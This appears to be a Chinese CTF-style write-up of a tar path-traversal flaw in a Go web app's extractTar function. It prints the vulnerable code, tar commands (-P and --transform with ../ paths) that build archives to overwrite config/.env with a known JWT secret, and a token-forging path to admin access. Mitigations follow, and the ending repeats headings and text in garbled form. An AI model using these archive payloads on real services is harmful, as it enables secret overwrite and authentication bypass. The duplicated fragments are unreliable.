Go Web中的Tar解压缩路径穿越漏洞分析与利用<\/h1>

漏洞概述<\/h2>
在Go语言的Web开发中，处理文件上传和压缩文件（如tar文件）时，存在路径遍历漏洞。这种漏洞允许攻击者通过精心构造的tar文件，将文件解压到任意目录，从而覆盖重要文件或执行其他恶意操作。<\/p>

漏洞代码分析<\/h2>

关键代码位置<\/h3>

漏洞主要存在于file.go<\/code>文件中的extractTar<\/code>函数：<\/p>

func<\/span> extractTar<\/span>(tarPath<\/span> string<\/span>, userID<\/span> uint<\/span>) (string<\/span>, error<\/span>) {
<\/span><\/span>    userDir<\/span> :=<\/span> filepath<\/span>.Join<\/span>(extractedDir<\/span>, fmt<\/span>.Sprintf<\/span>("%d"<\/span>, userID<\/span>))
<\/span><\/span>    err<\/span> :=<\/span> os<\/span>.MkdirAll<\/span>(userDir<\/span>, os<\/span>.ModePerm<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    tarFile<\/span>, err<\/span> :=<\/span> os<\/span>.Open<\/span>(tarPath<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    defer<\/span> tarFile<\/span>.Close<\/span>()
<\/span><\/span>
<\/span><\/span>    extractor<\/span> :=<\/span> &<\/span>tar<\/span>.Extractor<\/span>{
<\/span><\/span>        Path<\/span>: userDir<\/span>,
<\/span><\/span>    }
<\/span><\/span>    err<\/span> = extractor<\/span>.Extract<\/span>(tarFile<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    return<\/span> userDir<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用条件<\/h3>

系统使用github.com\/whyrusleeping\/tar-utils<\/code>库进行tar文件解压<\/li>
解压时没有对文件路径进行严格校验<\/li>
目标系统有敏感文件可被覆盖（如.env<\/code>文件）<\/li>
<\/ol>
漏洞利用方法<\/h2>
方法一：使用-P参数创建恶意tar文件<\/h3>


在Linux系统中创建多层目录结构：<\/p>
mkdir -p \/tmp\/exp\/config
<\/span><\/span>echo "JWT_SECRET=Hacker!!!Is_secret!!!"<\/span> > \/tmp\/exp\/config\/.env
<\/span><\/span><\/code><\/pre><\/li>

使用-P参数创建tar文件（保留绝对路径）：<\/p>
tar -cvPf malicious.tar -C \/tmp exp\/config\/.env
<\/span><\/span><\/code><\/pre><\/li>

上传该tar文件后，系统会解压并覆盖.\/config\/.env<\/code>文件<\/p>
<\/li>
<\/ol>
方法二：使用transform参数修改路径<\/h3>


创建测试文件：<\/p>
mkdir -p \/tmp\/exp
<\/span><\/span>echo "JWT_SECRET=Hacker!!!Is_secret!!!"<\/span> > \/tmp\/exp\/.env
<\/span><\/span><\/code><\/pre><\/li>

使用transform参数创建恶意tar文件：<\/p>
tar --transform 's,exp\/,exp\/..\/..\/..\/,'<\/span> -cvf malicious.tar -C \/tmp exp\/.env
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
路径穿越原理<\/h3>
底层源码中的解压文件函数在处理路径时：<\/p>

将路径字符串按\/<\/code>划分<\/li>
丢弃第一个切片<\/li>
因此：

对于\/..\/..\/..\/.env<\/code>只需要三层回退<\/li>
对于..\/..\/..\/..\/config\/.env<\/code>需要四层回退<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用流程<\/h2>

构造恶意tar文件覆盖.env<\/code>文件（包含已知的JWT密钥）<\/li>
上传恶意tar文件<\/li>
系统解压时会覆盖config\/.env<\/code>文件<\/li>
重新登录系统，使用已知密钥伪造JWT token<\/li>
获取管理员权限访问flag文件<\/li>
<\/ol>
防御措施<\/h2>


解压前校验文件路径：<\/p>
func<\/span> safeJoin<\/span>(base<\/span>, path<\/span> string<\/span>) (string<\/span>, error<\/span>) {
<\/span><\/span>    fullPath<\/span> :=<\/span> filepath<\/span>.Join<\/span>(base<\/span>, path<\/span>)
<\/span><\/span>    if<\/span> !strings<\/span>.HasPrefix<\/span>(filepath<\/span>.Clean<\/span>(fullPath<\/span>), filepath<\/span>.Clean<\/span>(base<\/span>)+<\/span>string(os<\/span>.PathSeparator<\/span>)) {
<\/span><\/span>        return<\/span> ""<\/span>, fmt<\/span>.Errorf<\/span>("unsafe path traversal"<\/span>)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> fullPath<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用安全的解压库或自行实现安全的解压逻辑<\/p>
<\/li>

限制上传文件类型和大小<\/p>
<\/li>

对敏感配置文件设置只读权限<\/p>
<\/li>

使用不可变的配置或环境变量<\/p>
<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了在文件处理过程中路径校验的重要性。通过精心构造的tar文件，攻击者可以绕过常规的文件上传限制，实现目录穿越和敏感文件覆盖。开发者在实现文件解压功能时，必须对所有解压路径进行严格校验，防止路径穿越攻击。<\/p>

Go Web中的Tar解压缩路径穿越漏洞分析与利用<\/h1>

漏洞概述<\/h2> 在Go语言的Web开发中，处理文件上传和压缩文件（如tar文件）时，存在路径遍历漏洞。这种漏洞允许攻击者通过精心构造的tar文件，将文件解压到任意目录，从而覆盖重要文件或执行其他恶意操作。<\/p>

漏洞代码分析<\/h2>

漏洞利用方法<\/h2>

漏洞概述<\/h2>
在Go语言的Web开发中，处理文件上传和压缩文件（如tar文件）时，存在路径遍历漏洞。这种漏洞允许攻击者通过精心构造的tar文件，将文件解压到任意目录，从而覆盖重要文件或执行其他恶意操作。<\/p>